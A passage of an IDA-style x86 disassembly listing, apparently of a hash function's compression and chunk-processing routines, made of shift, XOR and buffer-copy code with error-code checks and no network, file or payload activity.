xor ecx, [eax+0B8h]
xor edx, [eax+0BCh]
xor ecx, [ebp+var_C]
mov esi, [ebp+var_8]
mov [eax+13Ch], ebx
xor edx, esi
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Fh
xor ecx, edi
shr ebx, 0Fh
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 2
shl edi, 2
xor edi, ecx
mov ecx, [eax-0D0h]
and ecx, [eax+50h]
xor ebx, edx
mov edx, [eax-0CCh]
and edx, [eax+54h]
mov [eax+140h], edi
mov edi, [eax+0B8h]
mov [eax+144h], ebx
and edi, [eax+0A0h]
mov ebx, [eax+0BCh]
and ebx, [eax+0A4h]
xor ecx, edi
xor ecx, [eax-180h]
xor edx, ebx
xor edx, [eax-17Ch]
xor ecx, [eax+0C0h]
xor edx, [eax+0C4h]
xor ecx, [ebp+var_C]
xor edx, esi
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 7
xor ecx, edi
shr ebx, 7
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 1Dh
xor ebx, edx
mov edx, [eax-0C4h]
and edx, [eax+5Ch]
shl edi, 1Dh
xor edi, ecx
mov ecx, [eax-0C8h]
and ecx, [eax+58h]
mov [eax+148h], edi
mov edi, [eax+0C0h]
and edi, [eax+0A8h]
mov [eax+14Ch], ebx
mov ebx, [eax+0C4h]
and ebx, [eax+0ACh]
xor ecx, edi
xor ecx, [eax-178h]
xor edx, ebx
xor edx, [eax-174h]
xor ecx, [eax+0C8h]
xor edx, [eax+0CCh]
xor ecx, [ebp+var_C]
xor edx, esi
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Dh
xor ecx, edi
shr ebx, 0Dh
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 8
shl edi, 8
xor edi, ecx
mov ecx, [eax+0D0h]
mov [ebp+var_1C], ecx
mov ecx, [eax+0D4h]
mov [eax+150h], edi
mov edi, [ebp+var_14]
and edi, [eax+0C8h]
xor ebx, edx
mov edx, [eax-0BCh]
and edx, [eax+64h]
mov [ebp+var_18], ecx
mov ecx, [eax-0C0h]
and ecx, [eax+60h]
mov [ebp+var_3C], edi
mov edi, [ebp+var_10]
and edi, [eax+0CCh]
xor ecx, [ebp+var_3C]
xor edx, edi
xor ecx, [eax-170h]
xor edx, [eax-16Ch]
xor ecx, [ebp+var_1C]
xor edx, [ebp+var_18]
xor ecx, [ebp+var_C]
mov [eax+154h], ebx
xor edx, esi
mov edi, ecx
mov ebx, edx
shrd edi, ebx, 0Bh
shr ebx, 0Bh
xor ecx, edi
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 0Fh
xor ebx, edx
mov edx, [eax-0B4h]
and edx, [eax+6Ch]
shl edi, 0Fh
xor edi, ecx
mov ecx, [eax+0D8h]
mov [ebp+var_24], ecx
mov ecx, [eax+0DCh]
mov [eax+158h], edi
mov edi, [eax+0B8h]
mov [eax+15Ch], ebx
mov ebx, [ebp+var_1C]
and ebx, edi
mov edi, [ebp+var_18]
mov [ebp+var_20], ecx
mov ecx, [eax-0B8h]
and ecx, [eax+68h]
mov [ebp+var_44], ebx
xor ecx, [ebp+var_44]
mov ebx, [eax+0BCh]
xor ecx, [eax-168h]
and edi, ebx
xor ecx, [ebp+var_24]
xor edx, edi
xor edx, [eax-164h]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_20]
mov edi, ecx
xor edx, esi
mov ebx, edx
shrd edi, ebx, 7
xor ecx, edi
shr ebx, 7
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 5
xor ebx, edx
mov edx, [eax-0ACh]
and edx, [eax+74h]
shl edi, 5
xor edi, ecx
mov ecx, [eax+0E0h]
mov [eax+160h], edi
mov edi, [eax+0C0h]
mov [eax+164h], ebx
mov ebx, [ebp+var_24]
and ebx, edi
mov edi, [ebp+var_20]
mov [ebp+var_2C], ecx
mov ecx, [eax+0E4h]
mov [ebp+var_28], ecx
mov ecx, [eax-0B0h]
and ecx, [eax+70h]
mov [ebp+var_4C], ebx
xor ecx, [ebp+var_4C]
mov ebx, [eax+0C4h]
xor ecx, [eax-160h]
and edi, ebx
xor ecx, [ebp+var_2C]
xor edx, edi
xor edx, [eax-15Ch]
xor ecx, [ebp+var_C]
xor edx, [ebp+var_28]
mov edi, ecx
xor edx, esi
mov ebx, edx
shrd edi, ebx, 6
shr ebx, 6
xor ecx, edi
xor edx, ebx
mov edi, ecx
mov ebx, edx
shld ebx, edi, 1Fh
shl edi, 1Fh
xor edi, ecx
xor ebx, edx
mov ecx, [eax-0A8h]
and ecx, [eax+78h]
mov edx, [eax-0A4h]
and edx, [eax+7Ch]
mov [eax+168h], edi
mov edi, [eax+0C8h]
mov [eax+16Ch], ebx
mov ebx, [ebp+var_2C]
and ebx, edi
mov edi, [ebp+var_28]
mov [ebp+var_54], ebx
mov ebx, [eax+0CCh]
xor ecx, [ebp+var_54]
and edi, ebx
xor ecx, [eax-158h]
xor edx, edi
xor edx, [eax-154h]
xor ecx, [eax+0E8h]
xor edx, [eax+0ECh]
xor ecx, [ebp+var_C]
xor edx, esi
mov ebx, edx
mov edi, ecx
shrd edi, ebx, 0Ch
xor ecx, edi
shr ebx, 0Ch
xor edx, ebx
mov ebx, edx
mov edi, ecx
shld ebx, edi, 9
xor ebx, edx
shl edi, 9
xor edi, ecx
mov [eax+170h], edi
mov [eax+174h], ebx
mov eax, [ebp+var_C]
and eax, 2425CFA0h
mov edx, esi
shr edx, 1Fh
xor eax, edx
mov edx, [ebp+var_C]
mov ecx, esi
shld esi, edx, 1
and ecx, 7311C281h
xor edi, edi
shl edx, 1
xor ecx, edi
xor eax, edx
xor ecx, esi
dec [ebp+var_4]
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_8], ecx
jnz loc_9B6C49
pop edi
pop esi
pop ebx
locret_9B73CA: ; CODE XREF: sub_9B6C14+1C�j
leave
retn
sub_9B6C14 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B73CC(int,void *Src,int,void *Val)
sub_9B73CC proc near ; CODE XREF: sub_9B759C+123�p
arg_0 = dword ptr 8
Src = dword ptr 0Ch
arg_8 = dword ptr 10h
Val = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+Src], 0
push ebx
push edi
mov edi, [ebp+Val]
mov ebx, edi
jnz short loc_9B73E0
push 9
jmp short loc_9B73E8
; ---------------------------------------------------------------------------
loc_9B73E0: ; CODE XREF: sub_9B73CC+E�j
cmp [ebp+arg_0], 0
jnz short loc_9B73EE
push 0Fh
loc_9B73E8: ; CODE XREF: sub_9B73CC+12�j
pop eax
jmp loc_9B7473
; ---------------------------------------------------------------------------
loc_9B73EE: ; CODE XREF: sub_9B73CC+18�j
push esi
mov esi, [ebp+arg_8]
test esi, esi
jl short loc_9B746F
cmp esi, 0FFh
jg short loc_9B746F
test edi, edi
jnz short loc_9B741F
mov eax, esi
shl eax, 4
add eax, 59h
push 8 ; SizeOfElements
push eax ; NumOfElements
call calloc
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_9B741F
push 12h
jmp short loc_9B7471
; ---------------------------------------------------------------------------
loc_9B741F: ; CODE XREF: sub_9B73CC+34�j
; sub_9B73CC+4D�j
push 2C8h ; Size
push [ebp+Src] ; Src
push edi ; Dst
call memcpy
push esi
push edi
call sub_9B6C14
shl esi, 7
push 80h ; Size
lea eax, [esi+edi+248h]
push eax ; Src
push [ebp+arg_0] ; Dst
call memcpy
add esp, 20h
test ebx, ebx
jnz short loc_9B746B
add esi, 2C8h
push esi ; Size
push ebx ; Val
push edi ; Dst
call memset
push edi ; Memory
call free
add esp, 10h
loc_9B746B: ; CODE XREF: sub_9B73CC+85�j
xor eax, eax
jmp short loc_9B7472
; ---------------------------------------------------------------------------
loc_9B746F: ; CODE XREF: sub_9B73CC+28�j
; sub_9B73CC+30�j
push 11h
loc_9B7471: ; CODE XREF: sub_9B73CC+51�j
pop eax
loc_9B7472: ; CODE XREF: sub_9B73CC+A1�j
pop esi
loc_9B7473: ; CODE XREF: sub_9B73CC+1D�j
pop edi
pop ebx
pop ebp
retn
sub_9B73CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B7477 proc near ; CODE XREF: sub_9B74F1+79�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
cdq
shld edx, eax, 8
shl eax, 8
mov ecx, eax
mov eax, [ebp+arg_4]
push esi
mov esi, edx
cdq
or ecx, eax
mov eax, [ebp+arg_8]
or esi, edx
shld esi, ecx, 4
shl ecx, 4
cdq
or ecx, eax
mov eax, [ebp+arg_C]
or esi, edx
shld esi, ecx, 10h
shl ecx, 10h
cdq
or ecx, eax
mov eax, [ebp+arg_10]
or esi, edx
shld esi, ecx, 8
cdq
shl ecx, 8
or ecx, eax
mov eax, [ebp+arg_14]
or esi, edx
shld esi, ecx, 0Ch
cdq
shl ecx, 0Ch
or ecx, eax
or esi, edx
mov edx, esi
mov eax, ecx
pop esi
pop ebp
retn
sub_9B7477 endp
; =============== S U B R O U T I N E =======================================
sub_9B74D5 proc near ; CODE XREF: sub_9B74F1+4C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cdq
mov ecx, eax
mov eax, [esp+arg_4]
cdq
push esi
xor esi, esi
shl ecx, 18h
or esi, eax
or ecx, edx
mov eax, esi
mov edx, ecx
pop esi
retn
sub_9B74D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B74F1 proc near ; CODE XREF: sub_9B759C+DB�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Src = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
arg_2C = dword ptr 34h
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_4]
push esi
push edi
mov edi, [ebp+arg_0]
push 0Fh
pop esi
mov eax, edi
sub ecx, edi
mov [ebp+arg_0], esi
loc_9B7509: ; CODE XREF: sub_9B74F1+2A�j
mov edx, [ecx+eax]
mov [eax], edx
mov edx, [ecx+eax+4]
mov [eax+4], edx
add eax, 8
dec [ebp+arg_0]
jnz short loc_9B7509
mov ecx, [ebp+arg_8]
xor eax, eax
loc_9B7522: ; CODE XREF: sub_9B74F1+44�j
mov edx, [ecx+eax*8]
mov [edi+esi*8], edx
mov edx, [ecx+eax*8+4]
mov [edi+esi*8+4], edx
inc esi
inc eax
cmp eax, 8
jl short loc_9B7522
push [ebp+arg_10]
push [ebp+arg_C]
call sub_9B74D5
mov [ebp+Src], eax
push 8 ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [edi+esi*8]
push eax ; Dst
mov [ebp+var_4], edx
call memcpy
push [ebp+arg_28]
inc esi
push [ebp+arg_24]
push [ebp+arg_20]
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_14]
call sub_9B7477
mov [ebp+var_10], eax
push 8 ; Size
lea eax, [ebp+var_10]
push eax ; Src
lea esi, [edi+esi*8]
push esi ; Dst
mov [ebp+var_C], edx
call memcpy
push 200h ; Size
push [ebp+arg_2C] ; Src
add esi, 8
push esi ; Dst
call memcpy
add esp, 44h
pop edi
pop esi
leave
retn
sub_9B74F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B759C proc near ; CODE XREF: sub_9B7937+BE�p
Val = byte ptr -9F08h
Src = byte ptr -2C8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
arg_2C = dword ptr 34h
push ebp
mov ebp, esp
mov eax, 9F08h
call __alloca_probe
xor ecx, ecx
cmp [ebp+arg_0], ecx
push esi
push edi
jnz short loc_9B75B6
push 0Fh
jmp short loc_9B75BD
; ---------------------------------------------------------------------------
loc_9B75B6: ; CODE XREF: sub_9B759C+14�j
cmp [ebp+arg_2C], ecx
jnz short loc_9B75C3
push 0Ah
loc_9B75BD: ; CODE XREF: sub_9B759C+18�j
pop eax
jmp loc_9B76D5
; ---------------------------------------------------------------------------
loc_9B75C3: ; CODE XREF: sub_9B759C+1D�j
xor edx, edx
mov eax, 0FFh
cmp [ebp+arg_14], eax
push ebx
setnle dl
xor ebx, ebx
cmp [ebp+arg_14], ecx
setl bl
or edx, ebx
jz short loc_9B75E4
push 11h
jmp loc_9B76D3
; ---------------------------------------------------------------------------
loc_9B75E4: ; CODE XREF: sub_9B759C+3F�j
xor edx, edx
cmp [ebp+arg_18], eax
setnle dl
xor ebx, ebx
cmp [ebp+arg_18], ecx
setl bl
or edx, ebx
jz short loc_9B75FF
push 10h
jmp loc_9B76D3
; ---------------------------------------------------------------------------
loc_9B75FF: ; CODE XREF: sub_9B759C+5A�j
mov ebx, [ebp+arg_C]
cmp ebx, ecx
jl loc_9B76D1
cmp ebx, eax
jg loc_9B76D1
mov edi, [ebp+arg_20]
cmp edi, ecx
jl loc_9B76CD
cmp edi, 1000h
jg loc_9B76CD
mov esi, [ebp+arg_28]
cmp esi, ecx
jle loc_9B76C9
cmp esi, 200h
jg loc_9B76C9
cmp [ebp+arg_8], ecx
jnz short loc_9B764C
push 0Dh
jmp loc_9B76D3
; ---------------------------------------------------------------------------
loc_9B764C: ; CODE XREF: sub_9B759C+A7�j
cmp [ebp+arg_4], ecx
jnz short loc_9B7655
push 0Eh
jmp short loc_9B76D3
; ---------------------------------------------------------------------------
loc_9B7655: ; CODE XREF: sub_9B759C+B3�j
push [ebp+arg_2C]
lea eax, [ebp+Src]
push esi
push [ebp+arg_24]
push edi
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_9B74F1
mov eax, dword_9BB334
add esp, 30h
test eax, eax
jz short loc_9B76AB
push [ebp+arg_2C]
push esi
push [ebp+arg_24]
push edi
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call eax
add esp, 30h
loc_9B76AB: ; CODE XREF: sub_9B759C+EA�j
lea eax, [ebp+Val]
push eax ; Val
push [ebp+arg_14] ; int
lea eax, [ebp+Src]
push eax ; Src
push [ebp+arg_0] ; int
call sub_9B73CC
add esp, 10h
jmp short loc_9B76D4
; ---------------------------------------------------------------------------
loc_9B76C9: ; CODE XREF: sub_9B759C+92�j
; sub_9B759C+9E�j
push 2
jmp short loc_9B76D3
; ---------------------------------------------------------------------------
loc_9B76CD: ; CODE XREF: sub_9B759C+7B�j
; sub_9B759C+87�j
push 0Ch
jmp short loc_9B76D3
; ---------------------------------------------------------------------------
loc_9B76D1: ; CODE XREF: sub_9B759C+68�j
; sub_9B759C+70�j
push 0Bh
loc_9B76D3: ; CODE XREF: sub_9B759C+43�j
; sub_9B759C+5E�j ...
pop eax
loc_9B76D4: ; CODE XREF: sub_9B759C+12B�j
pop ebx
loc_9B76D5: ; CODE XREF: sub_9B759C+22�j
pop edi
pop esi
leave
retn
sub_9B759C endp
; =============== S U B R O U T I N E =======================================
sub_9B76D9 proc near ; CODE XREF: sub_9B774C+1F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
xor edx, edx
or edx, esi
xor ecx, ecx
or eax, ecx
mov ebx, edx
mov esi, edx
mov edi, eax
shld ebx, edi, 10h
mov ecx, eax
shrd ecx, esi, 10h
shld edx, eax, 10h
shl edi, 10h
xor ecx, edi
shr esi, 10h
xor esi, ebx
shl eax, 10h
mov edi, 0FFFFh
and esi, edi
and ecx, edi
xor esi, edx
xor ecx, eax
mov ebx, esi
mov edx, esi
mov edi, ecx
shld ebx, edi, 8
mov eax, ecx
shrd eax, edx, 8
shl edi, 8
shr edx, 8
xor eax, edi
shld esi, ecx, 8
xor edx, ebx
mov edi, 0FF00FFh
and eax, edi
and edx, edi
pop edi
xor edx, esi
shl ecx, 8
pop esi
xor eax, ecx
pop ebx
retn
sub_9B76D9 endp
; =============== S U B R O U T I N E =======================================
sub_9B774C proc near ; CODE XREF: sub_9B7937+6A�p
; sub_9B7DEE+62�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp dword_9BADF8, 1
jnz short locret_9B7780
push edi
xor edi, edi
cmp [esp+4+arg_4], edi
jle short loc_9B777F
push esi
loc_9B775F: ; CODE XREF: sub_9B774C+30�j
mov eax, [esp+8+arg_0]
lea esi, [eax+edi*8]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_9B76D9
inc edi
cmp edi, [esp+10h+arg_4]
pop ecx
pop ecx
mov [esi], eax
mov [esi+4], edx
jl short loc_9B775F
pop esi
loc_9B777F: ; CODE XREF: sub_9B774C+10�j
pop edi
locret_9B7780: ; CODE XREF: sub_9B774C+7�j
retn
sub_9B774C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B7781 proc near ; CODE XREF: sub_9B7B7B+BC�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov edi, [ebp+arg_C]
xor edx, edx
cmp edi, edx
jz loc_9B789B
mov eax, [ebp+arg_4]
mov ecx, eax
and ecx, 7
push ebx
push esi
mov [ebp+var_4], edx
jz short loc_9B77BF
mov ebx, [ebp+arg_0]
mov edx, ecx
mov esi, eax
shr esi, 3
mov bl, [esi+ebx]
mov cl, 8
sub cl, dl
shr bl, cl
movzx cx, bl
mov word ptr [ebp+var_4], cx
loc_9B77BF: ; CODE XREF: sub_9B7781+21�j
add edi, 7
shr eax, 3
shr edi, 3
xor esi, esi
test edi, edi
mov [ebp+var_C], eax
jle loc_9B7899
lea eax, [edi-1]
loc_9B77D8: ; CODE XREF: sub_9B7781+112�j
cmp esi, eax
jz short loc_9B77F0
mov eax, [ebp+arg_8]
movzx ax, byte ptr [esi+eax]
xor ecx, ecx
mov ch, byte ptr [ebp+var_4]
xor eax, ecx
add edx, 8
jmp short loc_9B7820
; ---------------------------------------------------------------------------
loc_9B77F0: ; CODE XREF: sub_9B7781+59�j
mov eax, [ebp+arg_C]
and eax, 7
mov [ebp+var_8], 8
jz short loc_9B7802
mov [ebp+var_8], eax
loc_9B7802: ; CODE XREF: sub_9B7781+7C�j
mov eax, [ebp+arg_8]
movzx eax, byte ptr [esi+eax]
mov ebx, [ebp+var_4]
mov cl, 8
sub cl, byte ptr [ebp+var_8]
shr al, cl
mov ecx, [ebp+var_8]
shl ebx, cl
movzx ax, al
or eax, ebx
add edx, ecx
loc_9B7820: ; CODE XREF: sub_9B7781+6D�j
mov [ebp+var_4], eax
xor ecx, ecx
lea eax, [edi-1]
cmp esi, eax
setnz cl
mov [ebp+var_10], ecx
loc_9B7830: ; CODE XREF: sub_9B7781+10D�j
mov ecx, [ebp+var_10]
xor eax, eax
cmp edx, 8
setnl al
test eax, ecx
jnz short loc_9B7854
xor ecx, ecx
lea eax, [edi-1]
cmp esi, eax
setz cl
xor ebx, ebx
test edx, edx
setnle bl
test ecx, ebx
jz short loc_9B7890
loc_9B7854: ; CODE XREF: sub_9B7781+BC�j
push 8
pop eax
cmp edx, eax
mov [ebp+var_8], eax
jg short loc_9B7861
mov [ebp+var_8], edx
loc_9B7861: ; CODE XREF: sub_9B7781+DB�j
mov ebx, [ebp+var_4]
mov cl, dl
sub cl, byte ptr [ebp+var_8]
shr bx, cl
mov ecx, eax
sub ecx, [ebp+var_8]
mov eax, 0FF00h
shl bl, cl
mov ecx, [ebp+var_8]
sar eax, cl
mov ecx, [ebp+var_C]
and bl, al
mov eax, [ebp+arg_0]
inc [ebp+var_C]
sub edx, [ebp+var_8]
mov [ecx+eax], bl
jmp short loc_9B7830
; ---------------------------------------------------------------------------
loc_9B7890: ; CODE XREF: sub_9B7781+D1�j
inc esi
cmp esi, edi
jl loc_9B77D8
loc_9B7899: ; CODE XREF: sub_9B7781+4E�j
pop esi
pop ebx
loc_9B789B: ; CODE XREF: sub_9B7781+E�j
pop edi
leave
retn
sub_9B7781 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B789E(void *Dst,int)
sub_9B789E proc near ; CODE XREF: sub_9B6BB9+19�p
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
push edi
push 4
cdq
pop ecx
idiv ecx
mov esi, [ebp+Dst]
mov edi, eax
add edi, 28h
test esi, esi
jnz short loc_9B78BD
push 3
pop eax
jmp short loc_9B7933
; ---------------------------------------------------------------------------
loc_9B78BD: ; CODE XREF: sub_9B789E+18�j
push ebx
xor ebx, ebx
inc ebx
cmp [ebp+arg_4], ebx
jl short loc_9B792F
cmp [ebp+arg_4], 200h
jg short loc_9B792F
push 3C98h ; Size
push 0 ; Val
push esi ; Dst
mov dword_9BADF8, ebx
call memset
mov eax, [ebp+arg_4]
xor ecx, ecx
add esp, 0Ch
mov [esi], eax
xor eax, eax
cmp edi, 0FFh
setnle cl
xor edx, edx
cmp edi, eax
setl dl
mov [esi+128h], eax
mov dword ptr [esi+12Ch], 40h
or ecx, edx
jz short loc_9B7916
push 11h
jmp short loc_9B7931
; ---------------------------------------------------------------------------
loc_9B7916: ; CODE XREF: sub_9B789E+72�j
mov [esi+130h], edi
mov [esi+0CCh], ebx
mov [esi+134h], ebx
mov dword_9BB334, eax
jmp short loc_9B7932
; ---------------------------------------------------------------------------
loc_9B792F: ; CODE XREF: sub_9B789E+26�j
; sub_9B789E+2F�j
push 2
loc_9B7931: ; CODE XREF: sub_9B789E+76�j
pop eax
loc_9B7932: ; CODE XREF: sub_9B789E+8F�j
pop ebx
loc_9B7933: ; CODE XREF: sub_9B789E+1D�j
pop edi
pop esi
pop ebp
retn
sub_9B789E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B7937 proc near ; CODE XREF: sub_9B7A26+A2�p
Dst = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_9B7947
push 3
jmp short loc_9B7952
; ---------------------------------------------------------------------------
loc_9B7947: ; CODE XREF: sub_9B7937+A�j
cmp dword ptr [esi+0CCh], 0
jnz short loc_9B7958
push 5
loc_9B7952: ; CODE XREF: sub_9B7937+E�j
pop eax
jmp loc_9B7A23
; ---------------------------------------------------------------------------
loc_9B7958: ; CODE XREF: sub_9B7937+17�j
push ebx
mov ebx, [ebp+arg_8]
test ebx, ebx
jge short loc_9B7968
push 6
loc_9B7962: ; CODE XREF: sub_9B7937+38�j
pop eax
jmp loc_9B7A22
; ---------------------------------------------------------------------------
loc_9B7968: ; CODE XREF: sub_9B7937+27�j
cmp ebx, 1Ch
jl short loc_9B7971
push 7
jmp short loc_9B7962
; ---------------------------------------------------------------------------
loc_9B7971: ; CODE XREF: sub_9B7937+34�j
lea eax, [esi+0D8h]
add dword ptr [eax], 1
adc dword ptr [eax+4], 0
cmp ebx, 1
jnz short loc_9B79A8
mov eax, [esi+12Ch]
inc eax
cmp eax, ebx
jle short loc_9B7998
push 40h
lea eax, [esi+338h]
jmp short loc_9B79A0
; ---------------------------------------------------------------------------
loc_9B7998: ; CODE XREF: sub_9B7937+55�j
push 30h
lea eax, [esi+3B8h]
loc_9B79A0: ; CODE XREF: sub_9B7937+5F�j
push eax
call sub_9B774C
pop ecx
pop ecx
loc_9B79A8: ; CODE XREF: sub_9B7937+4A�j
push edi
lea ecx, [esi+ebx*4+3B38h]
mov [ebp+arg_4], ecx
mov eax, 1000h
sub eax, [ecx]
mov ecx, ebx
shl ecx, 9
lea ecx, [ecx+esi+138h]
push ecx
push dword ptr [esi]
lea edi, [esi+ebx*8+3BB0h]
push dword ptr [esi+128h]
add esi, 0E8h
push eax
push [ebp+arg_C]
mov [ebp+Dst], ecx
push dword ptr [esi+44h]
push dword ptr [esi+48h]
push dword ptr [edi]
push ebx
push esi
push offset loc_9A70D8
push [ebp+arg_0]
call sub_9B759C
xor ecx, ecx
add esp, 30h
cmp eax, ecx
jnz short loc_9B7A21
add dword ptr [edi], 1
mov eax, [ebp+arg_4]
push 200h ; Size
adc [edi+4], ecx
push ecx ; Val
push [ebp+Dst] ; Dst
mov [eax], ecx
call memset
add esp, 0Ch
xor eax, eax
loc_9B7A21: ; CODE XREF: sub_9B7937+CA�j
pop edi
loc_9B7A22: ; CODE XREF: sub_9B7937+2C�j
pop ebx
loc_9B7A23: ; CODE XREF: sub_9B7937+1C�j
pop esi
leave
retn
sub_9B7937 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B7A26 proc near ; CODE XREF: sub_9B7A26+148�p
; sub_9B7B7B+FD�p ...
Src = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 80h
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
jnz short loc_9B7A3E
push 3
jmp short loc_9B7A48
; ---------------------------------------------------------------------------
loc_9B7A3E: ; CODE XREF: sub_9B7A26+12�j
cmp [esi+0CCh], ebx
jnz short loc_9B7A4E
push 5
loc_9B7A48: ; CODE XREF: sub_9B7A26+16�j
pop eax
jmp loc_9B7B77
; ---------------------------------------------------------------------------
loc_9B7A4E: ; CODE XREF: sub_9B7A26+1E�j
cmp [ebp+arg_8], ebx
push edi
mov edi, [ebp+arg_4]
jnz short loc_9B7A6B
cmp dword ptr [esi+edi*4+3B38h], 1000h
jnb short loc_9B7AB1
loc_9B7A64: ; CODE XREF: sub_9B7A26+6C�j
; sub_9B7A26+77�j ...
xor eax, eax
jmp loc_9B7B76
; ---------------------------------------------------------------------------
loc_9B7A6B: ; CODE XREF: sub_9B7A26+2F�j
cmp edi, [esi+134h]
jnz short loc_9B7AB1
mov eax, [esi+12Ch]
inc eax
cmp edi, eax
jnz short loc_9B7A9F
cmp dword ptr [esi+edi*4+3B38h], 400h
jnz short loc_9B7AB1
cmp [esi+edi*8+3BB4h], ebx
ja short loc_9B7A64
cmp [esi+edi*8+3BB0h], ebx
jbe short loc_9B7AB1
jmp short loc_9B7A64
; ---------------------------------------------------------------------------
loc_9B7A9F: ; CODE XREF: sub_9B7A26+56�j
cmp edi, 1
jle short loc_9B7AB1
cmp dword ptr [esi+edi*4+3B38h], 400h
jz short loc_9B7A64
loc_9B7AB1: ; CODE XREF: sub_9B7A26+3C�j
; sub_9B7A26+4B�j ...
cmp [ebp+arg_8], ebx
jz short loc_9B7AC1
cmp edi, [esi+134h]
jnz short loc_9B7AC1
xor ebx, ebx
inc ebx
loc_9B7AC1: ; CODE XREF: sub_9B7A26+8E�j
; sub_9B7A26+96�j
push ebx
push edi
lea eax, [ebp+Src]
push esi
push eax
call sub_9B7937
add esp, 10h
test eax, eax
jnz loc_9B7B76
cmp ebx, 1
jnz short loc_9B7AF7
push 80h ; Size
lea eax, [ebp+Src]
push eax ; Src
add esi, 8
push esi ; Dst
call memcpy
add esp, 0Ch
jmp loc_9B7A64
; ---------------------------------------------------------------------------
loc_9B7AF7: ; CODE XREF: sub_9B7A26+B5�j
mov eax, [esi+12Ch]
inc eax
inc edi
cmp edi, eax
jl short loc_9B7B2B
mov edi, eax
cmp edi, eax
jnz short loc_9B7B2B
mov eax, [esi+edi*8+3BB0h]
or eax, [esi+edi*8+3BB4h]
jnz short loc_9B7B2B
lea eax, [esi+edi*4+3B38h]
cmp dword ptr [eax], 0
jnz short loc_9B7B2B
mov dword ptr [eax], 400h
loc_9B7B2B: ; CODE XREF: sub_9B7A26+DB�j
; sub_9B7A26+E1�j ...
push 80h ; Size
lea eax, [ebp+Src]
push eax ; Src
lea ebx, [esi+edi*4+3B38h]
mov eax, [ebx]
shr eax, 3
mov ecx, edi
shl ecx, 9
add eax, esi
lea eax, [ecx+eax+138h]
push eax ; Dst
call memcpy
add dword ptr [ebx], 400h
lea eax, [esi+134h]
add esp, 0Ch
cmp edi, [eax]
jle short loc_9B7B69
mov [eax], edi
loc_9B7B69: ; CODE XREF: sub_9B7A26+13F�j
push [ebp+arg_8]
push edi
push esi
call sub_9B7A26
add esp, 0Ch
loc_9B7B76: ; CODE XREF: sub_9B7A26+40�j
; sub_9B7A26+AC�j
pop edi
loc_9B7B77: ; CODE XREF: sub_9B7A26+23�j
pop esi
pop ebx
leave
retn
sub_9B7A26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B7B7B proc near ; CODE XREF: sub_9B6BB9+32�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
